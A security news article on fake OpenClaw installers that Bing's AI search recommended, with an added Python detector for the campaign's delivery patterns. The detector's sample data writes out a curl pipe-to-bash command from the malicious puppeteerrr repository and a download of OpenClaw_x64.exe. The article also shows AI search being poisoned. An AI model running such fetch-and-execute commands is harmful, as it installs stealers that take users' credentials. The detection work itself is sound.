
Fake OpenClaw installers hosted in GitHub repositories and promoted by Microsoft Bing's AI-enhanced search function instructed users to run commands that deployed info stealers and proxy malware.
OpenClaw is an open-source AI agent that gained popularity as a personal assistant capable of executing tasks. It has access to local files and can integrate with email, messaging apps, and online services.
Because of its broad local access, threat actors saw an opportunity to collect sensitive information by publishing malicious skills (instruction files) on the tool's official registry and GitHub.
Researchers at managed detection and response company Huntress discovered a new campaign last month that spread several executables for malware loaders and infostealers to users looking to install OpenClaw.
According to the researchers, the threat actor set up malicious GitHub repositories posing as OpenClaw installers, which were recommended by Bing in its AI-powered search results for the Windows version of the tool.

Source: Huntress
Bing AI's recommended download link in the image above points to a malicious OpenClaw installer on GitHub, Huntress researchers said in a report.
The researchers say that "simply hosting the malware on GitHub was enough to poison Bing AI search results."
A fake OpenClaw repository that Huntress analyzed looked legitimate at a quick glance, because the threat actor tied it to a GitHub organization named openclaw-installer. This may also have carried some weight in Bing's AI recommendation.
The GitHub accounts publishing these repositories were newly created, but tried to increase their legitimacy by copying real code from the Cloudflare moltworker project.

Source: Huntress
However, the repository offered an installation guide for OpenClaw on macOS, instructing the user to paste a bash command in Terminal. This would reach a separate GitHub organization called puppeteerrr and a repository named dmg.
"The repository contained numerous files that followed a theme of containing a shell script paired with a Mach-O executable," which Huntress identified as the Atomic Stealer malware.

Source: Huntress
For Windows users, the threat actor used the fake repositories to deliver OpenClaw_x64.exe, which deployed several malicious executables. Huntress says that the Windows Managed AV and Managed Defender for Endpoint solutions quarantined the files on the customer's machine that they analyzed.
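As an added defensive example (not code from Huntress or the OpenClaw project), the check below scans constructed command-line telemetry for the two delivery patterns described above: a curl-to-bash one-liner pulling from a GitHub organization other than the one hosting the official repository, and a download of OpenClaw_x64.exe from such an organization. The trusted organization name and the sample lines are assumptions.

```python
import re
from dataclasses import dataclass

# Allow-list of GitHub organizations whose installers are trusted.
# "openclaw-official" is a placeholder: replace it with the organization
# that actually hosts the official OpenClaw repository.
TRUSTED_ORGS = {"openclaw-official"}

# Captures <org> and <repo> from github.com or raw.githubusercontent.com URLs.
GITHUB_RE = re.compile(
    r"https?://(?:raw\.githubusercontent\.com|github\.com)/([A-Za-z0-9_.-]+)/([A-Za-z0-9_.-]+)"
)
# Fetch-and-execute pattern: curl/wget ... | [sudo] sh/bash/zsh
PIPE_TO_SHELL_RE = re.compile(r"\b(curl|wget)\b.*\|\s*(?:sudo\s+)?(?:ba|z)?sh\b")
# Name of the Windows installer reported in the campaign.
INSTALLER_EXE_RE = re.compile(r"OpenClaw_x64\.exe", re.IGNORECASE)

@dataclass
class Finding:
    line_no: int
    org: str
    repo: str
    reason: str

def scan_command_lines(lines):
    """Return a Finding for each command line fetching an installer from an untrusted GitHub org."""
    findings = []
    for n, line in enumerate(lines, 1):
        for org, repo in GITHUB_RE.findall(line):
            if org in TRUSTED_ORGS:
                continue
            if PIPE_TO_SHELL_RE.search(line):
                findings.append(Finding(n, org, repo, "pipe-to-shell install from untrusted org"))
            elif INSTALLER_EXE_RE.search(line):
                findings.append(Finding(n, org, repo, "installer exe from untrusted org"))
    return findings

# Constructed sample telemetry; repo/path names are illustrative, not real captures.
SAMPLE_LINES = [
    "curl -fsSL https://raw.githubusercontent.com/puppeteerrr/dmg/main/install.sh | bash",
    "curl -fsSL https://raw.githubusercontent.com/openclaw-official/openclaw/main/install.sh | bash",
    "powershell -c Invoke-WebRequest https://github.com/openclaw-installer/openclaw/releases/download/v1/OpenClaw_x64.exe -OutFile OpenClaw_x64.exe",
    "git clone https://github.com/puppeteerrr/dmg",
]

if __name__ == "__main__":
    for f in scan_command_lines(SAMPLE_LINES):
        print(f"line {f.line_no}: {f.org}/{f.repo}: {f.reason}")
```

Line 4 is deliberately left unflagged: cloning a repository is not execution, and flagging every git clone of an unknown org would drown analysts in noise.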
Most of the executables were Rust-based malware loaders that executed info stealers in memory, the researchers said, adding that one of the payloads was Vidar stealer, which contacted Telegram and Steam user profiles to get command-and-control (C2) data.
Another Windows executable delivered this way was the GhostSocks backconnect proxy malware, designed to turn users' machines into a proxy node.
An attacker can use the system to access accounts with credentials stolen from the machine, thus bypassing anti-fraud checks. Threat actors also use proxy nodes to route malicious traffic or to hide their tracks in attacks.
While investigating, Huntress identified several accounts and repositories used in the same campaign, which delivered malware to users looking for OpenClaw installers.
All of the malicious repositories were reported to GitHub, though it's unclear if they've been removed by now.
The official OpenClaw repository on GitHub is here. It's recommended to bookmark the official portals of the software you're using instead of searching online every time.
